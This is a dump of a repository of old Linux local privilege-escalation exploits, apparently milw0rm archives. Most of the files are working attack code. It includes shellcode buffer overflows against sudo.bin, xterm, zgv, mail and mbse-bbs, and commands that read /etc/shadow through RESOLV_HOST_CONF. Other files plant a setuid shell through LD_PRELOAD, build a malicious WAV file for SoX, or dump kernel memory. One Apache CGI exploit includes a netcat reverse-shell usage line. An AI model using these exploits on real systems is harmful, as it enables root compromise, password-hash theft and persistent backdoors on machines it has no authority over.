19 | exit 0 20 | fi 21 | fi 22 | 23 | export RESOLV_HOST_CONF=$FILE 24 | 25 | echo "[*] Glibc bug found by Charles Stevenson " 26 | echo "[*] krochos@linuxmail.org" 27 | sleep 1 28 | echo "[*] export RESOLV_HOST_CONF=/etc/shadow" 29 | ssh lt 2>/tmp/.resolv 30 | cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} ' 31 | 32 | # milw0rm.com [2001-01-25] 33 | -------------------------------------------------------------------------------- /linux/linux_exploits/273.c: -------------------------------------------------------------------------------- 1 | /* 2 | * 0x3142-sq-chpasswd.c 3 | * Squirremail chpasswd buffer overflow. 4 | * 5 | * Tested on SuSE 9. 6 | * The bug was found by Matias Neiff 7 | * Coded by x314 <0x3142 hushmail.com> 8 | * (c) 2004 Copyright by x314. 9 | * All Rights Reserved. 10 | * 11 | * Greets: m0s krewz. 12 | * 13 | */ 14 | 15 | #include 16 | 17 | char shellcode[]= 18 | "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" 19 | "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" 20 | "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" 21 | "\x68"; 22 | 23 | int main(int argc, char *argv[]) 24 | { 25 | char *env[2] = {shellcode, NULL}; 26 | int i; 27 | long ret, *addr_ptr; 28 | char *buffer, *ptr; 29 | 30 | buffer = malloc(200); 31 | 32 | printf("\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\n\n"); 33 | 34 | if(argc != 2) { 35 | printf("Usage: %s \n\n",argv[0]); 36 | exit(0); 37 | } 38 | 39 | ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]); 40 | 41 | // printf("Using ret = 0x%x\n\n", ret); 42 | 43 | ptr = buffer; 44 | addr_ptr = (long *) ptr; 45 | for(i=0; i < 200; i+=4) 46 | { 47 | *(addr_ptr++) = ret; 48 | } 49 | 50 | buffer[200-1] = 0; 51 | 52 | execle(argv[1], "chpasswd", buffer, "0x314", "m0s", 0, env); 53 | 54 | free(buffer); 55 | 56 | return 0; 57 | } 58 | 59 | 60 | 61 | 62 | // milw0rm.com [2004-04-20] 63 | -------------------------------------------------------------------------------- /linux/linux_exploits/285.c: -------------------------------------------------------------------------------- 1 | /* 2 | Slackware 7.1 /usr/bin/Mail Exploit give gid=1 ( bin ) 3 | if /usr/bin/Mail is setgid but it is not setgid, 4 | setuid for default. 5 | 6 | tested on my box ( sl 7.1 ) 7 | crazy exploited by kengz. 8 | GID.... \x01 = 1 (bin) 9 | \x02 = 2 , 10 | \x03 = 3 , 11 | ... \x0a = 10 12 | \x0b = 11 13 | .... 14 | */ 15 | 16 | #include 17 | #include 18 | #define GID "\x03" 19 | 20 | int main(int argc, char **argv) { 21 | char shellcode[] = 22 | "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31" 23 | "\xc0\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3"GID"\xb1" 24 | GID"\x31\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76" 25 | "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89" 26 | "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89" 27 | "\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; 28 | 29 | char buf2[10000]; 30 | char buffer[15000]; 31 | char nop[8000]; 32 | char *p, *q; 33 | long ret=0xbfffffff; 34 | int len, offset = 0, i,j,k,ii; 35 | ret = ret - 5000; 36 | 37 | for(k=0; k<2000; k+=4) 38 | *(long *)&buf2[k] = ret; 39 | 40 | for(k=0;k<7000;k++){ 41 | strcat(nop,"\x90"); 42 | } 43 | snprintf(buffer,12000,"%s%s%s",nop,shellcode,buf2); 44 | printf("Crazy Mail sploit by kengz \n"); 45 | printf("Hit ' . ' to go \n"); 46 | execl("/usr/bin/Mail","Mail","x","-s","x","-c",buffer,0); 47 | } 48 | 49 | 50 | // milw0rm.com [2001-03-03] 51 | -------------------------------------------------------------------------------- /linux/linux_exploits/290.sh: -------------------------------------------------------------------------------- 1 | #!/bin/tcsh 2 | # przyklad wykorzystania dziury w LD_PRELOAD 3 | # shadow (tested on redhat 6.0, should work on others) 4 | 5 | if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje 6 | cd /lib 7 | umask 0 8 | setenv LD_PRELOAD libSegFault.so 9 | setenv SEGFAULT_OUTPUT_NAME /etc/initscript 10 | echo czekaj... to moze chwile potrwac... 11 | while (! -e /etc/initscript ) 12 | ( userhelper >& /dev/null & ; killall -11 userhelper >& /dev/null ) > /dev/null 13 | end 14 | 15 | echo utworzylem plik initscript 16 | 17 | cat > /etc/initscript << _init_ 18 | cp /bin/bash /var/tmp/.nothing 19 | chmod 6755 /var/tmp/.nothing 20 | rm /etc/initscript 21 | _init_ 22 | 23 | echo i nawet go podmienilem 24 | 25 | # milw0rm.com [2001-03-04] 26 | -------------------------------------------------------------------------------- /linux/linux_exploits/3154.c: -------------------------------------------------------------------------------- 1 | /* GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit 2 | * ======================================================== 3 | * Multiple overflow conditions occur within mbse-bbs versions 0.70.0 & below. 4 | * The current version of mbse-bbs does not contain these weaknesses. 5 | * Exploitation of these vulnerabilities can facilitate a privilege escalation 6 | * attack in which an unprivileged user becomes root. Exploit calculates 7 | * return address where ASLR is not in use. Vulnerable code is shown below; 8 | * 9 | * matthew@localhost ~/foo/mbsebbs-0.70.0/unix $ cat -n mbuseradd.c 10 | * ... 11 | * 177 shell = calloc(PATH_MAX, sizeof(char)); 12 | * ... 13 | * 228 sprintf(shell, "%s/bin/mbsebbs", getenv("MBSE_ROOT")); 14 | * 15 | * (heap corruption in 0.33.17/stack overflow in others). 16 | * *** glibc detected *** free(): invalid next size (normal): 0x0804e068 *** 17 | * 18 | * Example Usage. 19 | * matthew@localhost ~ $ id 20 | * uid=1000(matthew) gid=100(users) groups=10(wheel),100(users) 21 | * matthew@localhost ~ $ ./prdelka-vs-GNU-mbsebbs /opt/mbse/bin/mbuseradd 22 | * [ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit 23 | * [ Using return address 0xbfffefd8 24 | * sh-3.1# id 25 | * uid=0(root) gid=1(bin) groups=10(wheel),100(users) 26 | * 27 | * - prdelka 28 | */ 29 | #include 30 | #include 31 | 32 | char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 33 | "\x31\xc0\x50\x68""//sh""\x68""/bin""\x89\xe3" 34 | "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 35 | 36 | int main(int argc,char* argv[]) { 37 | int i; 38 | long eip = 0x41414141; 39 | char envh[]="MBSE_ROOT="; 40 | printf("[ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit\n"); 41 | if(argc < 2) { 42 | printf("Error: [path]\n"); 43 | exit(0); 44 | } 45 | char* buffer = malloc(strlen(envh) + 4085 + sizeof(eip)); 46 | strcpy(buffer,envh); 47 | long ptr = (long)buffer; 48 | for(i = 1;i <= 4061;i++){ 49 | strncat(buffer,"A",1); 50 | } 51 | ptr = ptr + 4061; 52 | memcpy((char*)ptr,(char*)&eip,4); 53 | eip = 0xc0000000 -4 -strlen(argv[1]) -1 -strlen(buffer) -1 -strlen(shellcode) -1; 54 | memcpy((char*)ptr,(char*)&eip,4); 55 | char *env[] = {buffer,NULL}; 56 | printf("[ Using return address 0x%x\n",eip); 57 | execle(argv[1],argv[1],"x","x","x",shellcode,NULL,env); 58 | exit(0); 59 | } 60 | 61 | // milw0rm.com [2007-01-18] 62 | -------------------------------------------------------------------------------- /linux/linux_exploits/317.txt: -------------------------------------------------------------------------------- 1 | setenv RESOLV_HOST_CONF /etc/shadow; ping adfas 2 | 3 | # milw0rm.com [1996-01-01] 4 | -------------------------------------------------------------------------------- /linux/linux_exploits/319.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define PATH_SUDO "/usr/bin/sudo.bin" 8 | #define BUFFER_SIZE 1024 9 | #define DEFAULT_OFFSET 50 10 | 11 | u_long get_esp() 12 | { 13 | __asm__("movl %esp, %eax"); 14 | 15 | } 16 | 17 | main(int argc, char **argv) 18 | { 19 | u_char execshell[] = 20 | "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" 21 | "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" 22 | "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; 23 | 24 | char *buff = NULL; 25 | unsigned long *addr_ptr = NULL; 26 | char *ptr = NULL; 27 | 28 | int i; 29 | int ofs = DEFAULT_OFFSET; 30 | 31 | buff = malloc(4096); 32 | if(!buff) 33 | { 34 | printf("can't allocate memory\n"); 35 | exit(0); 36 | } 37 | ptr = buff; 38 | 39 | /* fill start of buffer with nops */ 40 | 41 | memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); 42 | ptr += BUFFER_SIZE-strlen(execshell); 43 | 44 | /* stick asm code into the buffer */ 45 | 46 | for(i=0;i < strlen(execshell);i++) 47 | *(ptr++) = execshell[i]; 48 | 49 | addr_ptr = (long *)ptr; 50 | for(i=0;i < (8/4);i++) 51 | *(addr_ptr++) = get_esp() + ofs; 52 | ptr = (char *)addr_ptr; 53 | *ptr = 0; 54 | 55 | printf("SUDO.BIN exploit coded by _PHANTOM_ 1997\n"); 56 | setenv("NLSPATH",buff,1); 57 | execl(PATH_SUDO, "sudo.bin","bash", NULL); 58 | } 59 | 60 | 61 | 62 | // milw0rm.com [1996-02-13] 63 | -------------------------------------------------------------------------------- /linux/linux_exploits/320.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/suidperl -U 2 | $ENV{PATH}="/bin:/usr/bin"; 3 | $>=0;$<=0; 4 | exec("/bin/bash"); 5 | 6 | 7 | # milw0rm.com [1996-06-01] 8 | -------------------------------------------------------------------------------- /linux/linux_exploits/322.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #define DEFAULT_OFFSET 0 6 | #define BUFFER_SIZE 1491 7 | 8 | long get_esp(void) 9 | { 10 | __asm__("movl %esp,%eax\n"); 11 | } 12 | 13 | main(int argc, char **argv) 14 | { 15 | char *buff = NULL; 16 | unsigned long *addr_ptr = NULL; 17 | char *ptr = NULL; 18 | 19 | char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" 20 | "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" 21 | "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" 22 | "\xeb\x18" 23 | "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" 24 | "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; 25 | 26 | int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE; 27 | 28 | if(argc>1) 29 | ofs=atoi(argv[1]); 30 | if(argc>2) 31 | bs=atoi(argv[2]); 32 | printf("Using offset of esp + %d (%x)\nBuffer size %d\n", 33 | ofs, get_esp()+ofs, bs); 34 | 35 | buff = malloc(4096); 36 | if(!buff) 37 | { 38 | printf("can't allocate memory\n"); 39 | exit(0); 40 | } 41 | ptr = buff; 42 | memset(ptr, 0x90, bs-strlen(execshell)); 43 | ptr += bs-strlen(execshell); 44 | for(i=0;i < strlen(execshell);i++) 45 | *(ptr++) = execshell[i]; 46 | addr_ptr = (long *)ptr; 47 | for(i=0;i < (8/4);i++) 48 | *(addr_ptr++) = get_esp() + ofs; 49 | ptr = (char *)addr_ptr; 50 | *ptr = 0; 51 | execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL); 52 | } 53 | 54 | 55 | // milw0rm.com [1996-08-24] 56 | -------------------------------------------------------------------------------- /linux/linux_exploits/331.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | cxterm buffer overflow exploit for Linux. This code is tested on 4 | both Slackware 3.1 and 3.2. 5 | 6 | Ming Zhang 7 | mzhang@softcom.net 8 | */ 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #define CXTERM_PATH "/usr/X11R6/bin/cxterm" 15 | #define BUFFER_SIZE 1024 16 | #define DEFAULT_OFFSET 50 17 | 18 | #define NOP_SIZE 1 19 | char nop[] = "\x90"; 20 | char shellcode[] = 21 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 22 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 23 | "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 24 | 25 | unsigned long get_sp(void) { 26 | __asm__("movl %esp,%eax"); 27 | } 28 | 29 | void main(int argc,char **argv) 30 | { 31 | char *buff = NULL; 32 | unsigned long *addr_ptr = NULL; 33 | char *ptr = NULL; 34 | int i,OffSet = DEFAULT_OFFSET; 35 | 36 | /* use a different offset if you find this program doesn't do the job */ 37 | if (argc>1) OffSet = atoi(argv[1]); 38 | 39 | buff = malloc(2048); 40 | if(!buff) 41 | { 42 | printf("Buy more RAM!\n"); 43 | exit(0); 44 | } 45 | ptr = buff; 46 | 47 | for (i = 0; i <= BUFFER_SIZE - strlen(shellcode) - NOP_SIZE; 48 | i+=NOP_SIZE) { 49 | memcpy (ptr,nop,NOP_SIZE); 50 | ptr+=NOP_SIZE; 51 | } 52 | 53 | for(i=0;i < strlen(shellcode);i++) 54 | *(ptr++) = shellcode[i]; 55 | 56 | addr_ptr = (long *)ptr; 57 | for(i=0;i < (8/4);i++) 58 | *(addr_ptr++) = get_sp() + OffSet; 59 | ptr = (char *)addr_ptr; 60 | *ptr = 0; 61 | (void) fprintf(stderr, 62 | "This bug is discovered by Ming Zhang 63 | (mzhang@softcom.net)\n"); 64 | /* Don't need to set ur DISPLAY to exploit this one, cool huh? */ 65 | execl(CXTERM_PATH, "cxterm", "-xrm",buff, NULL); 66 | } 67 | 68 | // milw0rm.com [1997-05-14] 69 | -------------------------------------------------------------------------------- /linux/linux_exploits/3384.c: -------------------------------------------------------------------------------- 1 | /* 2 | :: Kristian Hermansen :: 3 | Date: 20070229 4 | Description: Local attacker can influence Apache to direct commands 5 | into an open tty owned by user who started apache process, usually root. 6 | This results in arbitrary command execution. 7 | Affects: Apache 1.3.33/1.3.34 on Debian Stable/Testing/Unstable/Experimental and Ubuntu Warty (4.10)/Hoary (5.04)/Breezy (5.10)/Dapper (6.06) 8 | Edgy (6.10), Feisty (7.04). 9 | Notes: Must have CGI execution privileges and 10 | service started manually by root via shell. 11 | Also try adding "Options +ExecCGI" to your .htaccess file. 12 | Compile: gcc -o /path/to/cgi-bin/cgipwn cgipwn.c 13 | Usage: nc -vvv -l -p 31337 14 | http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d 15 | u53l355 gr33t5: yawn, jellyfish, phzero, pegasus, b9punk, phar, shardy, 16 | benkurtz, ... and who could forget ... setient (the gremlin)!! 17 | */ 18 | 19 | #include 20 | #include 21 | 22 | int main(int argc, char *argv[]) { 23 | int pts = open("/dev/tty",O_RDONLY); 24 | while(*argv[1] != '\0') { 25 | ioctl(pts,TIOCSTI,argv[1]); 26 | argv[1]++; 27 | } 28 | return 0; 29 | } 30 | 31 | // milw0rm.com [2007-02-28] 32 | -------------------------------------------------------------------------------- /linux/linux_exploits/339.c: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * zgv exploit coded by BeastMaster V on June 20, 1997 4 | * 5 | * USAGE: 6 | * For some strage reason, the filename length of this 7 | * particular exploit must me one character long, otherwise you 8 | * will be drop into a normal unpriviledged shell. Go Figure.... 9 | * 10 | * $ cp zgv_exploit.c n.c 11 | * $ cc -o n n.c 12 | * $ ./n 13 | * Oak driver: Unknown chipset (id = 0) 14 | * bash# 15 | * 16 | * EXPLANATION: zgv (suid root) does not check bounds for $HOME env. 17 | * TEMPORARY FIX: chmod u-s /usr/bin/zgv 18 | * NOTE: Don't forget to visit http://www.rootshell.com for more exploits. 19 | * DISCLAIMER: Please use this in a responsible manner. 20 | * 21 | */ 22 | 23 | #include 24 | #include 25 | #include 26 | 27 | char *shellcode = 28 | "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" 29 | "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" 30 | "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" 31 | "\xcd\x80/" 32 | "/bin/sh" 33 | "0"; 34 | 35 | char *get_sp() { 36 | asm("movl %esp,%eax"); 37 | } 38 | 39 | #define bufsize 4096 40 | char buffer[bufsize]; 41 | 42 | main() { 43 | int i; 44 | 45 | for (i = 0; i < bufsize - 4; i += 4) 46 | *(char **)&buffer[i] = get_sp() -4675; 47 | 48 | memset(buffer, 0x90, 512); 49 | memcpy(&buffer[512], shellcode, strlen(shellcode)); 50 | 51 | buffer[bufsize - 1] = 0; 52 | 53 | setenv("HOME", buffer, 1); 54 | 55 | execl("/usr/bin/zgv", "/usr/bin/zgv", NULL); 56 | } 57 | 58 | // milw0rm.com [1997-06-20] 59 | -------------------------------------------------------------------------------- /linux/linux_exploits/3427.php: -------------------------------------------------------------------------------- 1 | 0) 57 | break; 58 | } 59 | } 60 | $offset += 1024; 61 | } 62 | 63 | header("Content-type: application/octet-stream"); 64 | header("Content-Disposition: attachment; filename=\"server.der\""); 65 | echo $keydata; 66 | ?> 67 | 68 | # milw0rm.com [2007-03-07] 69 | -------------------------------------------------------------------------------- /linux/linux_exploits/3440.php: -------------------------------------------------------------------------------- 1 | 46 | 47 | # milw0rm.com [2007-03-09] 48 | -------------------------------------------------------------------------------- /linux/linux_exploits/3499.php: -------------------------------------------------------------------------------- 1 | 1, "B" => 1); 33 | 34 | function array_compare(&$key1, &$key2) 35 | { 36 | $GLOBALS['a'] = &$key2; 37 | unset($key2); 38 | return 1; 39 | } 40 | 41 | uksort($arr, "array_compare"); 42 | $x=array($shellcode => 1); 43 | 44 | $a[8*4+0] = $a[6*4+0]; 45 | $a[8*4+1] = chr(ord($a[6*4+1])+2); // <--- This only works for Little Endian 46 | $a[8*4+2] = $a[6*4+2]; 47 | $a[8*4+3] = $a[6*4+3]; 48 | 49 | unset($x); 50 | 51 | ?> 52 | 53 | # milw0rm.com [2007-03-16] 54 | -------------------------------------------------------------------------------- /linux/linux_exploits/3571.php: -------------------------------------------------------------------------------- 1 | 42 | 43 | # milw0rm.com [2007-03-25] 44 | -------------------------------------------------------------------------------- /linux/linux_exploits/3595.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define BUFSIZE 0x10000000 10 | 11 | int main(int argc, char *argv[]) 12 | { 13 | void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, 14 | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); 15 | if (mem == (void*)-1) { 16 | printf("Alloc failed\n"); 17 | return -1; 18 | } 19 | /* SOCK_DCCP, IPPROTO_DCCP */ 20 | int s = socket(PF_INET, 6, 33); 21 | if (s == -1) { 22 | fprintf(stderr, "socket failure!\n"); 23 | return 1; 24 | } 25 | /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ 26 | int len = BUFSIZE; 27 | int x = getsockopt(s, 269, 11, mem, &len); 28 | 29 | if (x == -1) 30 | perror("SETSOCKOPT"); 31 | else 32 | printf("SUCCESS\n"); 33 | 34 | write(1, mem, BUFSIZE); 35 | 36 | return 0; 37 | } 38 | 39 | // milw0rm.com [2007-03-28] 40 | -------------------------------------------------------------------------------- /linux/linux_exploits/369.pl: -------------------------------------------------------------------------------- 1 | # POC Exploit for SoX Stack Overflow Vulnerability found by Ulf Harnhammar 2 | # Tested Under Slackware 9.1 3 | # Serkan Akpolat sakpolat@gmx.net | deicide@siyahsapka.org 4 | # Homepage: http://deicide.siyahsapka.org 5 | # Greets to: Virulent 6 | # deicide@gate:~$ play britney.wav 7 | # sh-2.05b$ 8 | 9 | # "jmp %esp" from libc.so , change this if needed.. 10 | retJmpEsp=0x4029824B 11 | 12 | # intel_order() from MOSDEF 13 | def intel_order(myint): 14 | str="" 15 | a=chr(myint % 256) 16 | myint=myint >> 8 17 | b=chr(myint % 256) 18 | myint=myint >> 8 19 | c=chr(myint % 256) 20 | myint=myint >> 8 21 | d=chr(myint % 256) 22 | str+="%c%c%c%c" % (a,b,c,d) 23 | return str 24 | 25 | # Wave Header 26 | begin = "\x52\x49\x46\x46\x74\x05\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20" +\ 27 | "\x32\x00\x00\x00\x02\x00\x01\x00\x70\x17\x00\x00\x00\x0c\x00\x00" +\ 28 | "\x00\x01\x04\x00\x20\x00\xf4\x01\x07\x00\x00\x01\x00\x00\x00\x02" +\ 29 | "\x00\xff\x00\x00\x00\x00\xc0\x00\x40\x00\xf0\x00\x00\x00\xcc\x01" +\ 30 | "\x30\xff\x88\x01\x18\xff\x66\x61\x63\x74\x04\x00\x00\x00\x00\x00" +\ 31 | "\x00\x00\x64\x61\x74\x61\x00\x00\x00\x00\x4c\x49\x53\x54\x9a\x01" +\ 32 | "\x00\x00\x49\x4e\x46\x4f\x49\x41\x52\x54\x08\x00\x00\x00\x44\x65" +\ 33 | "\x69\x63\x69\x64\x65\x00\x49\x43\x52\x44\x7e\x01\x00\x00" 34 | shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" 35 | 36 | evilBuf = begin+"boom"*75+intel_order(retJmpEsp)+shellcode 37 | wavFile = open("britney.wav", "wb") 38 | wavFile.write(evilBuf) 39 | wavFile.close() 40 | print "Evil Song has been created :Pp" 41 | 42 | # milw0rm.com [2004-08-01] 43 | -------------------------------------------------------------------------------- /linux/linux_exploits/3730.txt: -------------------------------------------------------------------------------- 1 | ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield) 2 | 3 | http://www.exploit-db.com/sploits/04132007-pr0ftpd_modctrls.tgz 4 | 5 | # milw0rm.com [2007-04-13] 6 | -------------------------------------------------------------------------------- /linux/linux_exploits/40.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | ############################### 3 | # Mandrake 8.2 /usr/mail local exploit 4 | # 5 | # Usage: 6 | # perl d86mail.pl [offset] 7 | # Then enter "." (dot) and press 'Enter' 8 | # 9 | # Example: 10 | # [satan@localhost my]$ perl d86mail.pl 11 | # eip: 0xbffffddd 12 | # .[enter] 13 | # Cc: too long to edit 14 | # sh-2.05$ 15 | ############################### 16 | 17 | $shellcode = 18 | "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" . 19 | "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" . 20 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" . 21 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" . 22 | "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 23 | $size = 1000; 24 | $size2 = 8204; 25 | $retaddr = 0xbffffddd; 26 | $nop = "\x90"; 27 | $offset = 0; 28 | if (@ARGV == 1) { 29 | $offset = $ARGV[0]; 30 | } 31 | for ($i = 0; $i < ($size - length($shellcode) - 4); $i++) { 32 | $buffer .= $nop; 33 | } 34 | for ($i = 0; $i < ($size2); $i++) { 35 | $buffer2 .= "A"; 36 | } 37 | $buffer .= $shellcode; 38 | print "eip: 0x", sprintf('%lx',($retaddr + $offset)), "\n"; 39 | local($ENV{'EVILBUF'}) = $buffer; 40 | $newret = pack('l', ($retaddr + $offset)); 41 | $buffer2 .= $newret; 42 | exec("mail -s wow -c $buffer2 root@localhost"); 43 | 44 | #EOF 45 | 46 | 47 | # milw0rm.com [2003-06-10] 48 | -------------------------------------------------------------------------------- /linux/linux_exploits/4028.txt: -------------------------------------------------------------------------------- 1 | _ _ _____ _ ___ _____ _ _ 2 | / / / / ____/ / / _/_ __/ / / / 3 | / /_/ / __/ / / / / / / / /_/ / 4 | / __ / /___/ /____/ / / / / __ / 5 | /_/ /_/_____/_____/___/ /_/ /_/ /_/ 6 | Helith - 0815 7 | -------------------------------------------------------------------------------- 8 | 9 | Author : Rembrandt 10 | Date : 2007-06-03 11 | Affected Software: screen <= 4.0.3 12 | Affected OS : OpenBSD up to 4.4 (and propably others) 13 | Type : Local Authentication Bypass 14 | 15 | OSVDB : 39587 16 | Milw0rm : 4028 17 | CVE : 2007-3048 18 | ISS X-Force: : 34693 19 | 20 | screen, on some operating systems, is vulnerable to a local terminal screen 21 | lock authentication bypass that may allow physically proximate attackers to 22 | gain access to the system. 23 | 24 | This issue has been confirmed on OpenBSD with screen 4.0.3 on x86/amd64. 25 | The underlying vulnerability may be related to 3rd party authentication such 26 | as PAM. This issue was tested on OpenSuSE with screen 4.0.2 and was not 27 | vulnerable. 28 | 29 | 30 | Steps to reproduce: 31 | 32 | $ screen -S test 33 | [Screened session starts] 34 | $ id 35 | uid=1001(test) gid=1001(test) groups=1001(test) 36 | $ 37 | [type ctrl-a x] 38 | Key: test 39 | Again: test 40 | Screen used by test . 41 | Password: 42 | [type ctrl-c] 43 | $ screen -r 44 | [Regained access to screen, without password] 45 | 46 | The screen lock mechanism is designed to lock a terminal, not the entire shell 47 | session. If an attacker has shell access to the target account, it is understood 48 | they can bypass protection. However, on the system tested, the screen lock 49 | mechanism was bypassed using 'ctrl-c'. 50 | 51 | The vulnerability is not in OpenBSD. screen developers indicate this is known 52 | behavior, but do not appear to fully understand the scenario with which 53 | this can be abused. Replies to my initial disclosure suggest this may be 54 | related to PAM authentication, or another 3rd party package. Testing was 55 | not performed to fully identify the vulnerable code. 56 | 57 | Tobias Ulmer has committed a patch to the screen code that prevents 58 | this exploit from happening. 59 | 60 | 61 | Kind regards, 62 | Rembrandt 63 | 64 | # milw0rm.com [2008-06-18] 65 | -------------------------------------------------------------------------------- /linux/linux_exploits/4172.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept 3 | * dreyer 07-2007 4 | * Osu, Tatakae, Sexy Pandas! 5 | * 6 | * Dumps to stdout the memory mapped between INI and END. 7 | * 8 | * CVE: CVE-2007-1000 BID: 22904 9 | * 10 | * Affected: Linux Kernel < 2.6.20.2 11 | * 12 | * http://bugzilla.kernel.org/show_bug.cgi?id=8134 13 | * 14 | * Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html 15 | * 16 | * For free!!! ( worth 600 EUR in zerobay! ) 17 | * 18 | */ 19 | 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | 27 | #define HOPOPT_OFFSET 8 28 | #define INIADDR 0xc0100000 29 | #define ENDADDR 0xd0000000 30 | unsigned int i; 31 | 32 | 33 | int main(int argc, char *argv[]) { 34 | int s; 35 | unsigned int optlen; 36 | void *ptr; 37 | char value[10240]; 38 | char text[12]; 39 | 40 | fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n" 41 | "dreyer '07 - free feels better\n" 42 | "Dumping %p - %p to stdout\n",INIADDR,ENDADDR); 43 | 44 | s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); 45 | 46 | /* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */ 47 | setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0); 48 | 49 | /* Make 0x00000000 address valid */ 50 | ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); 51 | 52 | if (ptr != NULL) { 53 | perror("mmap"); 54 | exit(-1); 55 | } 56 | 57 | memset(ptr,0,4096); 58 | 59 | /* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt = 60 | * 0x00000000 + 8 */ 61 | ptr=(char *)((char *)ptr+HOPOPT_OFFSET); 62 | 63 | i=INIADDR; 64 | while(i0) { 71 | sprintf(text,"\n%08x:",i); 72 | write(1,text,strlen(text)); 73 | write(1,value,optlen); 74 | i=i+optlen; 75 | } else { 76 | /* We could not read this portion because of some error, skip it */ 77 | i=i+4; 78 | } 79 | } 80 | 81 | return 0; 82 | } 83 | 84 | // milw0rm.com [2007-07-10] 85 | -------------------------------------------------------------------------------- /linux/linux_exploits/434.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/434.sh -------------------------------------------------------------------------------- /linux/linux_exploits/438.c: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # 4 | # cdrecord-suidshell.sh - I)ruid [CAU] (09.2004) 5 | # 6 | # Exploits cdrecord's exec() of $RSH before dropping privs 7 | # 8 | 9 | cat > ./cpbinbash.c << __EOF__ 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | main( int argc, char *argv[] ) { 16 | int 